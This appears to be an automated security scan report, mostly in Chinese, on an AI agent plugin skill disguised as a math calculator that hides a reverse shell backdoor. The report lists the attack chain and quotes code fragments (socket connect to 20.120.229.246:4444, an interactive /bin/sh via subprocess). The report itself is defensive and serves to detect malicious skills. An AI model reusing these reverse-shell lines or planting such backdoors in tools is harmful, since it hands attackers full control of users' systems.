Scan Report
0 /100
math-calculator
数学计算器(伪装)/ 实际为反向Shell武器化PoC
数学计算器伪装下植入反向Shell后门,E2+SC2攻击模式明确——文档声称安全数学计算,实际代码在表达式验证前即触发远程代码执行,CVSS评分9.8。
Do not install this skill
立即禁用并归档此技能包。不得部署到任何生产环境。禁止在具有网络访问权限的环境中运行。
Attack Chain 6 steps
◎
Entry 用户调用skill (Bash执行calculate.py)
⬡
Escalation python3进程启动
⬡
Escalation safe_calculate()被调用
⬡
Escalation 反向Shell连接
20.120.229.246:4444 ⬡
Escalation 攻击者获得目标系统完全交互式Shell
◉
Impact 可进行横向移动/数据外泄/持久化
Findings 5 items
| Severity | Finding | Location |
|---|---|---|
| Critical | 反向Shell后门 — E2+SC2共现 | skills/math-calculator/scripts/calculate.py:32 |
| Critical | 文档-行为严重偏离(Shadow Functionality) | skills/math-calculator/SKILL.md:1 |
| High | 硬编码C2 IP地址 | skills/math-calculator/scripts/calculate.py:32 |
| Medium | eval()混淆真实意图 | skills/math-calculator/scripts/calculate.py:35 |
| Low | 存档注释暴露真实性质 | skills/math-calculator/scripts/calculate.py:61 |
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Filesystem | NONE | READ | ✓ Aligned | import os — 仅读环境变量,未越权 |
| Network | NONE | ADMIN | ✗ Violation | calculate.py:32 — socket.socket(AF_INET, SOCK_STREAM); s.connect(('20.120.229.24… |
| Shell | READ (Bash仅用于计算表达式) | ADMIN | ✗ Violation | calculate.py:32 — subprocess.call(['/bin/sh', '-i']) — 获取完全交互式Shell,文档完全未声明 |
1 High 1 findings
High IP Address 硬编码 IP 地址
20.120.229.246 skills/math-calculator/scripts/calculate.py:32 File Tree
5 files · 4.9 KB · 163 lines Python 1f · 74L
Markdown 2f · 65L
JSON 2f · 24L
├─
▾
.claude-plugin
│ ├─
marketplace.json
JSON
│ └─
plugin.json
JSON
├─
▾
skills
│ └─
▾
math-calculator
│ ├─
▾
scripts
│ │ └─
calculate.py
Python
│ └─
SKILL.md
Markdown
└─
README.md
Markdown
Security Positives
✓ 无.env敏感文件泄露
✓ 无额外第三方依赖(无requirements.txt),减少供应链攻击面
✓ 预扫描工具正确识别了硬编码IP和高危IOC